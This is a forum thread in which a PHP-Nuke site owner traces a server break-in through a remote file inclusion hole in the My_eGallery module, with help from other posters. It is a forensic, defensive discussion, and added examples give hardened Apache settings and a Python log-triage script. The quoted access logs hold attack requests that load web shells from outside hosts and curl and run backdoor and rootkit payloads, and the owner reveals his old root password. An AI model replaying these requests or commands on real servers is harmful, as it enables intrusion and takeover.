marcelolaia
Hangin' Around
Joined: Sep 28, 2005
Posts: 36
Location: Brazil
Posted: Thu Jun 01, 2006 5:20 am
Hi,
My home server was hacked and I can't find the way used to hack it.
I inspected root's .bash_history and found these:
Could anyone help me find the vulnerability?
I use PHP-Nuke 7.4 and my server is Debian stable.
I have the log files in /var/log and I see that the file psyBNC2.3.2-4.tar.gz was created on May 1.
Thank you
kguske
Site Admin
Joined: Jun 04, 2004
Posts: 6437
Posted: Thu Jun 01, 2006 6:21 am
Sounds like a needle in a very large haystack...
montego
Site Admin
Joined: Aug 29, 2004
Posts: 9457
Location: Arizona
Posted: Thu Jun 01, 2006 7:14 am
Doubtful this was hacked because of PHP-Nuke unless you used the same user IDs and/or passwords in Nuke that you were using to actually log in to the server. This guy somehow got your root password? You have to find out how he/she got user-level access to the server (or was it root access?).
If you do not have to access your server remotely (i.e., you have a keyboard and monitor connected up directly), then you may want to disable remote user login. I don't know how to do that, but I know it is possible in most *nix environments.
VinDSL
Life Cycles Becoming CPU Cycles
Joined: Jul 11, 2004
Posts: 614
Location: Arizona (USA) Admin: NukeCops.com Admin: Disipal Designs Admin: Lenon.com
Posted: Fri Jun 02, 2006 12:45 am
montego wrote: | Doubtful this was hacked because of PHP-Nuke... |
Gotta agree!
I have servers here at the house, Slackware boxes, but none of them have PHP-Nuke installed. And, the other day, I noticed hackers from India had been trying to get into them for the last three weeks. Hahaha! "I pity dah foos!" as Mr. T used to say...
Anyway, this sort of stuff just goes with the turf. I don't recognize a familiar pattern in what was submitted above...
VinDSL
Posted: Fri Jun 02, 2006 12:47 am
Um... BTW, if it was me, I'd disable wget and lynx!!! That's just asking for trouble...
VinDSL
Posted: Fri Jun 02, 2006 12:58 am
LoL! This gets more interesting the more I look at it!
As I hinted at above, 'they' used wget and lynx to upload the rootkit[s] to your site... Then, away they went...
Make sure your server is recognizing the MIMEs mentioned above, such as:
Code:
AddType application/x-tar .tar
AddType application/x-gzip .gz .tgz
AddType application/x-tar .tgz
...and so forth, and so on!
Also, while you're at it, you might as well take care of RAR, since a LOT of 'script kiddies' are taking advantage of this vuln right now.
This applies to ALL Nuke web sites:
Code:
AddType application/x-rar-compressed .rar
This has snuck under the radar at MANY mass web hosts... mostly 'cause they all use the same canned software, like cPanel/WHM
VinDSL
Posted: Fri Jun 02, 2006 1:24 am
Heh! One more post and I'll stop spamming...
Some of you might find this interesting! I posted it the other day on another web site...
==============================
To see if 'your' server is vulnerable to this (ahem) unspecified attack, try the following...
Create a plain text file containing the following code:
Code:
<?php print 'Oops! If you can read this, your web server is vulnerable to attack!'; ?>
Save and rename it to vindsl.php.rar, then upload it somewhere on 'your' server.
Then, run it in your browser by entering the URL in the browser's address bar, i.e. http://www.example.com/vindsl.php.rar
If the page shows the message:
Quote: | Oops! If you can read this, your web server is vulnerable to attack! |
...you should be alarmed!
If it returns garbled text, or just asks you to download the file, then 'your' web server is probably configured okay and you're not vulnerable. Otherwise, use the fix above...
==============================
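Why a file named vindsl.php.rar can run as PHP, and the configuration that closes it, as an added example (not VinDSL's or the forum's own configuration): Apache's mod_mime looks at every dotted extension of a filename and applies each one it recognises, so when PHP is attached to `.php` with `AddType`, a trailing `.rar` that maps to nothing leaves the PHP type in place. The fragment below shows that weak binding, the partial fix suggested above, and a binding that only matches names ending in `.php`. The site and upload paths are assumptions.

```apache
# Added example, not configuration from the thread. Assumes mod_php on
# Apache 2.x with the site under /var/www and user uploads landing in
# /var/www/modules/My_eGallery/public (both paths assumed).

# --- Weak: the binding the PHP manual of the day suggested ---
# mod_mime looks at every dotted extension of a filename. "shell.php.rar"
# gets the PHP type from ".php" and, because ".rar" maps to nothing, keeps it.
AddType application/x-httpd-php .php

# --- Partial fix (the one suggested in the thread) ---
# Give the trailing extension a type of its own so it overrides ".php".
# This only works when PHP is attached with AddType, as above. If PHP is
# attached with a handler ("AddHandler php5-script .php", common on
# Red Hat/cPanel builds), a type for .rar does not remove that handler and
# shell.php.rar still runs; that is one reason the .rar test can keep failing.
AddType application/x-rar-compressed .rar
AddType application/x-gzip .gz .tgz
AddType application/x-tar .tar

# --- Hardened: attach PHP only to names that END in .php ---
<Directory "/var/www">
    # Drop the per-extension binding, then match on the whole name.
    RemoveType .php
    RemoveHandler .php
    <FilesMatch "\.php$">
        SetHandler application/x-httpd-php
    </FilesMatch>
</Directory>

# --- Upload directory: nothing executes here, whatever it is called ---
<Directory "/var/www/modules/My_eGallery/public">
    php_admin_flag engine off
    Options -ExecCGI -Includes
</Directory>
```

`AddType`, `RemoveType` and `SetHandler` can also go in an `.htaccess` file, but only if the enclosing `<Directory>` allows it: under `AllowOverride None` the file is not read at all, and if `FileInfo` (or `Options`, for the `Options` line) is not in the override list, Apache answers with a 500 error instead. `php_admin_flag` is server-config only. After restarting Apache, repeat the vindsl.php.rar request above; the browser should now offer the file for download.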
marcelolaia
Posted: Fri Jun 02, 2006 5:34 am
Dear kguske, montego, VinDSL,
kguske: yes, this is a needle in a very large haystack, for me!
montego:
Quote: | you used the same userid's and/or passwords in Nuke that you were using to actually log in to the server |
Yes! I have a general user on my server with the same username and password that I was using in Nuke.
Quote: | This guy somehow got your root password? |
Yes, the guy got my root password. My root password was a very uncommon one. It was: DP83905AVQB . I suppose that he did a reverse connection with an IRC script, gained access to an Apache shell script and ran the command "passwd" to change the root password. In my view, he did not discover my root password.
Quote: | If you do not have to access your server remotely (...), then you may want to disable remote user login |
Yes, I have a keyboard, monitor and mouse connected. But my server was in another place, so I need to connect to it by SSH. But, as I wrote above, I suppose that the guy did a reverse connection!!!! This is the problem: how do I block reverse connections and how do I block access to an Apache shell???
VinDSL
Quote: | I'd disable wget and lynx!!! |
Yes, I will uninstall these two applications.
Quote: | Then, away they went... |
Yes, I am sure that he went!
Quote: | Make sure your server is recognizing the MIMEs mentioned above, such as:
Code:
AddType application/x-tar .tar
AddType application/x-gzip .gz .tgz
AddType application/x-tar .tgz
(...)
This applies to ALL Nuke web sites:
Code:
AddType application/x-rar-compressed .rar
|
I am sorry, but what are you suggesting? Where do I find/modify this? In httpd.conf? I am sorry, but my English is very poor!!!
I am very interested, to prevent and to learn, in how the guy gained access to my shell???
I suppose that it uploaded the rootkit to a dir with write permission in the My_eGallery module!!! Then, I would like to discover it or confirm it or not...
Thank you very much
montego
Posted: Fri Jun 02, 2006 6:22 am
Quote: | I suppose that it uploaded the rootkit to a dir with write permission in the My_eGallery module!!! Then, I would like to discover it or confirm it or not... |
The only way to confirm this, I think, is through your Apache logs.
I am glad VinDSL is in on this discussion because he is WAY more knowledgeable about this stuff than I.
marcelolaia
Posted: Thu Jun 08, 2006 12:53 pm
Hi Friends,
I found out what the kiddies did on my site. Here is how:
Quote:
85.107.33.26 - - [28/Apr/2006:20:07:55 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt? HTTP/1.1" 200 4234 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:07:58 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=home HTTP/1.1" 200 221 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:00 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=forward HTTP/1.1" 200 131 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:03 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=up HTTP/1.1" 200 211 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:05 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=search HTTP/1.1" 200 262 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:06 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=back HTTP/1.1" 200 131 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:07 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=refresh HTTP/1.1" 200 212 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:08 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=buffer HTTP/1.1" 200 175 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:14 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a HTTP/1.1" 200 4910 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:17 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=refresh HTTP/1.1" 200 212 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:19 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=sort_asc HTTP/1.1" 200 97 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:23 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=buffer HTTP/1.1" 200 175 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:33 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=chmod&f=index.php&d=%2Fvar%2Fwww HTTP/1.1" 200 3134 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:43 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=chmod&f=index.php&d=%2Fvar%2Fwww HTTP/1.1" 200 3134 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:46 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=buffer HTTP/1.1" 200 175 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=chmod&f=index.php&d=%2Fvar%2Fwww" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
85.107.33.26 - - [28/Apr/2006:20:08:51 -0300] "POST /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F& HTTP/1.1" 200 3152 "http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=chmod&f=index.php&d=%2Fvar%2Fwww" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:11:35 -0300] "GET /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2044 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:13:39 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2152 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:13:54 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2032 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:14:04 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2081 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:14:12 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2073 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:14:18 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2161 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:14:34 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2079 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:14:42 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2079 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:16:05 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2035 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:17:18 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2076 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:17:23 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2161 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:21:12 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 1966 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:22:13 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2249 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:22:40 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2052 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:22:46 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2322 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:23:15 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2282 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:23:40 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2703 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:24:08 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2117 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:24:19 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2052 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.143.102.139 - - [28/Apr/2006:21:26:58 -0300] "POST /modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt? HTTP/1.1" 200 2109 "http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
201.69.37.104 - - [29/Apr/2006:03:21:18 -0300] "GET /modules.php?op=modload&name=My_eGallery&file=index&do=showpic&pid=2 HTTP/1.1" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9 "
201.69.37.104 - - [29/Apr/2006:03:21:29 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=id HTTP/1.1" 200 8755 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9 "
201.69.37.104 - - [29/Apr/2006:03:23:52 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=?&cmd=uptime HTTP/1.1" 200 848 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9 "
201.69.37.104 - - [29/Apr/2006:03:23:59 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=id HTTP/1.1" 200 8755 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9 "
201.69.37.104 - - [29/Apr/2006:03:24:08 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=id HTTP/1.1" 200 8755 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9 "
201.69.37.104 - - [29/Apr/2006:03:24:14 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=?&cmd=cd%20/tmp;curl%20-o%20abnc.txt%20www.pharoeste.net/abnc.txt;perl%20abnc.txt%20-n%20-s%20xolkx%20-p%205555%20-P%20bash HTTP/1.1" 200 848 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9 "
201.69.37.104 - - [29/Apr/2006:03:24:38 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=uptime HTTP/1.1" 200 8780 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9 "
201.69.37.104 - - [29/Apr/2006:03:25:24 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=cd%20/var/tmp;curl%20-o%20ryo.tar.gz%20http://badboybm.100free.com/ryo.tar.gz;tar%20-zxvf%20ryo.tar.gz;cd%20.access.log;./config%20identd%201988;./run;./f*** HTTP/1.1" 200 9021 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9 "
201.69.37.104 - - [29/Apr/2006:03:25:55 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=cd%20/tmp;curl%20-o%20abnc.txt%20www.pharoeste.net/abnc.txt;perl%20abnc.txt%20-n%20-s%20xolkx%20-p%205555%20-P%20bash HTTP/1.1" 200 8944 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9 "
The script that he used is here:
http://triton2006.100free.com/cmd.txt
Now, what do I do to prevent a new attack???
Could you help me?
I would like to continue using a gallery. Is Menalto the option?
Thank you very much
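A small log triage script, added here as an example and not part of the original post, that pulls the remote-include attempts out of Apache combined-format lines like the ones above. It flags any request whose query parameter is itself an absolute URL (the `basepath=http://...` pattern that made displayCategory.php include a remote file) or that carries a `cmd=` parameter, decodes the command, and lists what the command downloaded. The sample lines are constructed, with documentation addresses and made-up hosts standing in for the real ones in the post.

```python
import re
from urllib.parse import unquote_plus

# Apache "combined" log format, the format of the lines quoted in the post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# A parameter whose value is an absolute URL is the signature of a remote file
# inclusion attempt: include($basepath . "/x.php") fetches it over HTTP when
# allow_url_fopen is on.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines modelled on the post (documentation IPs, made-up hosts).
SAMPLE_LOG = r'''
203.0.113.7 - - [28/Apr/2006:20:07:55 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://attacker.example/c99shell.txt? HTTP/1.1" 200 4234 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
203.0.113.7 - - [28/Apr/2006:20:08:14 -0300] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fattacker.example%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a HTTP/1.1" 200 4910 "http://my_site.com/" "Mozilla/4.0"
198.51.100.9 - - [29/Apr/2006:03:21:18 -0300] "GET /modules.php?op=modload&name=My_eGallery&file=index&do=showpic&pid=2 HTTP/1.1" 200 0 "-" "Mozilla/4.0"
198.51.100.9 - - [29/Apr/2006:03:23:52 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=?&cmd=uptime HTTP/1.1" 200 848 "-" "Mozilla/4.0"
198.51.100.9 - - [29/Apr/2006:03:24:14 -0300] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://attacker.example/cmd.txt?&cmd=cd%20/tmp;curl%20-o%20abnc.txt%20www.dropsite.example/abnc.txt;perl%20abnc.txt%20-n%20-s%20xolkx%20-p%205555%20-P%20bash HTTP/1.1" 200 8944 "-" "Mozilla/4.0"
'''.strip().splitlines()


def parse_query(query):
    """Split a raw query string on '&' only and percent-decode both sides.

    Done by hand rather than with urllib.parse.parse_qsl because older
    Pythons also split on ';', which would cut a shell command such as
    cmd=cd /tmp;curl ... into pieces.
    """
    params = []
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.append((unquote_plus(key), unquote_plus(value)))
    return params


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    # Split on the first '?' by hand: urlsplit() would read a request target
    # starting with '//' (present in the post's log) as a host name.
    path, _, query = rec["target"].partition("?")
    rec["path"] = path
    rec["params"] = parse_query(query)
    return rec


def fetched_urls(cmd):
    """Download sources in a ';'-chained command (curl/wget, source is the last word)."""
    urls = []
    for segment in cmd.split(";"):
        words = segment.strip().split()
        if len(words) >= 2 and words[0] in ("curl", "wget"):
            urls.append(words[-1])
    return urls


def find_rfi(lines):
    """One finding per request carrying a remote-URL parameter or a cmd= parameter."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        remote = [(k, v) for k, v in rec["params"] if REMOTE_URL_RE.match(v)]
        cmd = dict(rec["params"]).get("cmd")
        if not remote and cmd is None:
            continue
        findings.append({
            "ip": rec["ip"],
            "time": rec["time"],
            "script": rec["path"],
            "param": remote[0][0] if remote else None,
            # the attackers append '?' so the rest of the include path becomes a query
            "payload_url": remote[0][1].rstrip("?") if remote else None,
            "status": rec["status"],
            "cmd": cmd,
            "downloads": fetched_urls(cmd) if cmd else [],
        })
    return findings


if __name__ == "__main__":
    for f in find_rfi(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['script']} param={f['param']} "
              f"payload={f['payload_url']} cmd={f['cmd']!r} downloads={f['downloads']}")
```

Run it over the real access log with `find_rfi(open("/var/log/apache2/access.log"))` (path assumed). A 200 status on a flagged line only means Apache served the request; whether the remote file was actually included shows up in the response size, which in the post jumps from 848 bytes for `basepath=?` to several kilobytes once the shell loads. The `downloads` list is the first place to look for what else landed on the box.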
Tao_Man
Involved
Joined: Jul 15, 2004
Posts: 252
Location: OKC, OK
Posted: Thu Jun 08, 2006 3:16 pm
I tried your test of vindsl.php.rar and, sad to say, it failed. So I added the MIME types in my .htaccess file but it did not do anything. I checked on the Apache site and could not find anything else to do; is there some trick?
I guess they may not have mod_mime turned on.
kenwood
Worker
Joined: May 18, 2005
Posts: 119
Location: SVCDPlaza
Posted: Fri Jun 09, 2006 4:08 am
On SUSE you can add the mime_magic module to APACHE_MODULES in the file /etc/sysconfig/apache2.
The MIME type goes in the file /etc/mime.types.
Restart Apache and it will work.
montego
Posted: Fri Jun 09, 2006 6:24 am
marcelolaia, without knowing My_eGallery, I am not certain of the best way. My initial reaction was to add the following check towards the top of each of the My_eGallery scripts:
Code:
// MODULE_FILE is defined by PHP-Nuke's modules.php before it loads a module,
// so a script reached by a direct URL never sees it and stops here.
if ( !defined('MODULE_FILE') )
{
    die("You can't access this file directly...");
}
This would prevent these direct access attempts; however, I am not 100% sure whether this would cause issues with the operation of the tool. It depends on whether they wrote it to work within the nuke "structure", meaning everything comes in through modules.php or admin.php.
Another possible "killer" for this, if, again, it was written specifically for nuke and NO direct calls are made under this structure outside modules.php and admin.php, is to place a password on the My_eGallery module directory through your host control panel or use CGI Auth on it.
Unfortunately, although nuke has had many holes which have needed patching over the years, it is only as strong as its weakest link, and if you throw in a module that has "holes" then immediately your whole nuke site is vulnerable.
I have not heard about as many issues with Menalto's Gallery, and they are still a very active bunch, so you might want to try using that instead. If you do decide to switch, be sure to get rid of the old module that is not secure!
